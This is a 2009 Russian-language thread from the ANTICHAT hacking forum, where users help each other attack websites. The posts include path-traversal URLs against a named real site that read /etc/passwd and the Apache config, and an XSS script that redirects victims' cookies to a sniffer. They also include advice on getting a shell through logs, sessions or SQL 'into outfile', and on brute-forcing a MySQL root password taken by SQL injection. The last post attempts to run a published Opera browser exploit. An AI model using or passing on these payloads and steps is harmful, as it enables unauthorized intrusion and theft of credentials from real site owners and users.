ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.07.2009, 11:19
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Ctacok
Запрос метода GET или POST?
Вааще если GET то врядтле ограничят.
А если через POST то в инпуте есть ограничение.
Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
>>Вааще если GET то врядтле ограничят.
бред
PHP код:
<?php
if($_GET['hehe'] and strlen($_GET['hehe'])<16)
{
echo 'ok';
}else{
exit;
}
?>
>>А если через POST то в инпуте есть ограничение.
<input type=text name="rate" size=12 maxlength=8>
ГЕТ или ПОСТ все равно будет ограничение
>>Убери его через исходник, но это если сам php скрипт непроверяет входящие данные.
сам понял что написал?
|
|
|
08.07.2009, 11:19
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
Возможно ли сдесь найти логи? (по стандартным путям не нашёл)
|
|
|
|
08.07.2009, 11:22
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Damned_one
Такой вопрос оч волнует - есть ограничение на ввод символов > 16 в XSS конструкции '><script>alert()</script>
Есть ли какой-то способ втиснуться? может сервисом сокращения воспользоваться?
Но тогда каким? И что сокращать: http://sniffer.gif?+document.cookie
это? помогите пожалуста... мозги спарились уже
<SCRIPT language=javascript>
location="твой снифер";
</SCRIPT>
|
|
|
|
08.07.2009, 11:24
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от farpost
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://www.jedit.org/index.php?page=../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
Возможно ли сдесь найти логи? (по стандартным путям не нашёл)
На счет путей не знаю, но можно найти полный путь до сайта. В файле httpd.conf ищеть DocumentRoot... Вот он "/var/www/html"... Попробуй пути еще раз из тех, что ettee давал. Вот - http://forum.antichat.ru/thread49775.html
|
|
|
|
08.07.2009, 11:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
farpost, nub-hacker, 1. Ищите логи и пробуйте залить шелл через них. 2. Пробуйте через сессии.
|
|
|
|
08.07.2009, 11:57
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
|
|
|
|
08.07.2009, 12:41
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
Сообщение от Tigger
DocumentRoot... Вот он "/var/www/html"...
Внизу есть вот это
<VirtualHost *:80>
ServerName localhost
DocumentRoot "/var/www/html"
<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>
По-моему это значит что папка доступна только для 127.0.0.1. Или нет?? По крайней мере скрипты по этому пути не читаются
|
|
|
|
08.07.2009, 13:08
|
|
Новичок
Регистрация: 25.04.2007
Сообщений: 16
Провел на форуме:
110445
Репутация:
1
|
|
Hi all greets to ur amazing job here
sorry fo my english
but i need help with this
now i got into site with sql inj and mysql.user table
1-got root and pass
what is the way to decrypt it?
2- i got access to load_file works but i cant find my way on the server
by load_file() doesnt got me any error
load_file(etc/passwd) works good
is there is any way to deal with this ????????
thanx to u all
|
|
|
|
08.07.2009, 13:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Hello,
Сообщение от AHMED HASSAN
Hi all greets to ur amazing job here
sorry fo my english
but i need help with this
now i got into site with sql inj and mysql.user table
1-got root and pass
what is the way to decrypt it?
To decrypt(right is not "decrypt", but bruteforce ) mysql root password you can use a PasswordsPro utility from www.insidepro.com
but under some circumbstances you won't need a mysql root password.
If you get a pass, than you can look for phpmyadmin, or try to connect to mysql using mysql utility.
2- i got access to load_file works but i cant find my way on the server
by load_file() doesnt got me any error
load_file(etc/passwd) works good
is there is any way to deal with this ????????
FIrst of all, if magic_quotes_gpc option is off, you can try a "select into outfile" query, to upload a shell. to do this you should know a absolute local path. to find out the paths try to read default configs and logs with load_file() function.
if magic_quotes_gpc option is on, try to get as much information as possible, probably that would help you(e.g. config files with ftp or other passwords). |
|
|
|
08.07.2009, 14:31
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Сплоет заточен под Оперу. 9.63.
http://milw0rm.com/exploits/7135
Пытаюсь запустить через виртуалку.
Система Windows XP. Service Pack 3.
Браузер Opera 9.24
Эксплоит должен вызывать калькулятор после перезаполнение буфера.
Но никак не могу разобратся с вызовом удаленного кода(калькулятор).
Он должен запускаться со стороны клиента, или со стороны сервера?
Код:
var evil = "file://";
- пуста по умолчанию.
Пытался выполнить как
Код:
var evil = "http://test.test./cals.exe";
и
Код:
var evil = "file://cals.exe";
- да толку ноль.  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
